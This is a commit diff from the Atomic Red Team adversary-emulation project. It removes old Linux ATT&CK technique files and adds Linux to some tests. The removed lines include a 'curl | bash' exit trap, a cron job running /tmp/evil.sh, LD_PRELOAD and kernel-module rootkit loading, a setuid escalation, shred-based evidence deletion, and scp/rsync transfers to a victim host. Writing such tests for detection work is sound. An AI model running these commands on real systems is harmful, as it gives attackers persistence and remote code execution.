Merge pull request #229 from redcanaryco/Linux-completion

Done
2018-05-25 14:17:40 -04:00
parent 2c6de1a620 71023f23cf
commit 44a2bb8aec
16 changed files with 85 additions and 165 deletions
@@ -1,23 +0,0 @@
-## File Deletion
-
-MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
-
-### Victim Configuration
-
-    echo "This file will be shredded" > /tmp/victim-shred.txt
-    mkdir /tmp/victim-files
-    cd /tmp/victim-files
-    touch a b c d e f g
-
-### Delete a single file
-
-    rm -f /tmp/victim-files/a
-
-### Delete an entire folder
-
-    rm -rf /tmp/victim-files
-
-### Overwrite and delete a file with shred
-
-    shred -u /tmp/victim-shred.txt
-
@@ -1,21 +0,0 @@
-## Rootkits
-
-MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
-
-### Loadable Kernel Module based Rootkit
-
-Input:
-
-    sudo insmod MODULE.ko
-
-OR
-
-Input:
-
-    sudo modprobe MODULE.ko
-
-### LD_PRELOAD based Rootkit
-
-Input:
-
-    export LD_PRELOAD=$PWD/libmy_r00tkit.so
@@ -1,35 +0,0 @@
-# Remote File Copy
-
-MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
-
-## Adversary System Configuration
-### Ensure SSH access has been configured for an adversary account
-    echo "This file transferred by scp" > /tmp/adversary-scp
-    echo "This file transferred by sftp" > /tmp/adversary-sftp
-    mkdir /tmp/adversary-rsync
-    cd /tmp/adversary-rsync
-    touch a b c d e f g
-
-## Victim System Configuration
-### Ensure SSH access has been configured for a victim account
-### Ensure write access for victim account to this directory
-    mkdir /tmp/victim-files
-    cd /tmp/victim-files
-
-## Push files to victim using rsync
-    rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
-
-## Pull files from adversary using rsync
-    rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
-
-## Push files to victim using scp
-    scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
-
-## Pull file from adversary using scp
-    scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
-
-## Push files to victim using sftp
-    sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
-
-## Pull file from adversary using sftp
-    sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
@@ -1,24 +0,0 @@
-## Browser Extensions
-
-MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
-
-
-### Chrome (Developer Mode)
-
-Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
-
-Then click 'Select'
-
-### Chrome (Chrome Web Store)
-
-Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
-
-### Firefox
-
-Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
-
-Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
-
-Then click 'Open'
@@ -1,6 +0,0 @@
-# Cron Job
-
-MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
-
-
-    echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
@@ -1,22 +0,0 @@
-# Hidden Files and Directories
-
-MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
-
-To create visible directories and files
-
-    mkdir visible-directory
-    echo "this file is visible" > visible-directory/visible-file
-
-    # List the contents the current directory and visible directory
-    ls
-    ls visible-directory
-
-
-To create hidden directories and files
-
-    mkdir .hidden-directory
-    echo "this file is hidden" > .hidden-directory/.hidden-file
-
-    # List the contents the current directory and hidden directory
-    ls -la
-    ls -la .hidden-directory
@@ -1,10 +0,0 @@
-# Trap
-
-MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
-
-
-    trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
-
-    exit
-
-After exiting the shell, the script will download and execute.
@@ -1,6 +0,0 @@
-# .bash_profile and .bashrc
-
-MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
-
-    echo "/path/to/script.py" >> ~/.bash_profile
-    echo "/path/to/script.py" >> ~/.bashrc
@@ -1,15 +0,0 @@
-# Setuid and Setgid
-
-MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
-
-Navigate to [hello.c](../Payloads/hello.c)
-
-Input:
-
-    make hello
-
-    sudo chown root hello
-
-    sudo chmod u+s hello
-
-    ./hello
@@ -24,7 +24,7 @@ Permissions Required: User, Administrator</blockquote>
 ## Atomic Test #1 - .bash_profile and .bashrc
 xxx

-**Supported Platforms:** macOS
+**Supported Platforms:** macOS, Linux


 #### Inputs
@@ -9,6 +9,7 @@ atomic_tests:

  supported_platforms:
    - macos
+    - linux

  input_arguments:
    script:
@@ -41,6 +41,10 @@ Permissions Required: User</blockquote>

 - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)

+- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
+
+- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
+

 <br/>

@@ -127,3 +131,35 @@ xxx
 defaults write com.apple.finder AppleShowAllFiles YES
 ```
 <br/>
+<br/>
+
+## Atomic Test #7 - Create visible Directories
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir visible-directory
+echo "this file is visible" > visible-directory/visible-file
+ls
+ls visible-directory
+```
+<br/>
+<br/>
+
+## Atomic Test #8 - Create hidden directories and files
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir .hidden-directory
+echo "this file is hidden" > .hidden-directory/.hidden-file
+ls -la
+ls -la .hidden-directory
+```
+<br/>
@@ -84,3 +84,35 @@ atomic_tests:
    name: sh
    command: |
      defaults write com.apple.finder AppleShowAllFiles YES
+
+- name: Create visible Directories
+  description: |
+    xxx
+
+  supported_platforms:
+    - macos
+    - linux
+
+  executor:
+    name: sh
+    command: |
+      mkdir visible-directory
+      echo "this file is visible" > visible-directory/visible-file
+      ls
+      ls visible-directory
+
+- name: Create hidden directories and files
+  description: |
+    xxx
+
+  supported_platforms:
+    - macos
+    - linux
+
+  executor:
+    name: sh
+    command: |
+      mkdir .hidden-directory
+      echo "this file is hidden" > .hidden-directory/.hidden-file
+      ls -la
+      ls -la .hidden-directory
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
-  - Atomic Test #1: .bash_profile and .bashrc [macos]
+  - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1015 Accessibility Features](./T1015/T1015.md)
  - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -37,6 +37,8 @@
  - Atomic Test #4: Hidden files [macos]
  - Atomic Test #5: Hide a Directory [macos]
  - Atomic Test #6: Show all hidden files [macos]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1179 Hooking](./T1179/T1179.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -167,6 +169,8 @@
  - Atomic Test #4: Hidden files [macos]
  - Atomic Test #5: Hide a Directory [macos]
  - Atomic Test #6: Show all hidden files [macos]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1147 Hidden Users](./T1147/T1147.md)
  - Atomic Test #1: Hidden Users [macos]
 - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -1,6 +1,7 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
+  - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1176 Browser Extensions](./T1176/T1176.md)
  - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -11,6 +12,8 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
  - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
  - Atomic Test #3: Hidden file [macos, linux]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1168 Local Job Scheduling](./T1168/T1168.md)
  - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
@@ -128,6 +131,8 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
  - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
  - Atomic Test #3: Hidden file [macos, linux]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
  - Atomic Test #3: rm -rf [macos, linux]
@@ -1,7 +1,7 @@
 # macOS Atomic Tests by ATT&CK Tactic & Technique
 # persistence
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
-  - Atomic Test #1: .bash_profile and .bashrc [macos]
+  - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1176 Browser Extensions](./T1176/T1176.md)
  - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -16,6 +16,8 @@
  - Atomic Test #4: Hidden files [macos]
  - Atomic Test #5: Hide a Directory [macos]
  - Atomic Test #6: Show all hidden files [macos]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1159 Launch Agent](./T1159/T1159.md)
@@ -190,6 +192,8 @@
  - Atomic Test #4: Hidden files [macos]
  - Atomic Test #5: Hide a Directory [macos]
  - Atomic Test #6: Show all hidden files [macos]
+  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1147 Hidden Users](./T1147/T1147.md)
  - Atomic Test #1: Hidden Users [macos]
 - [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)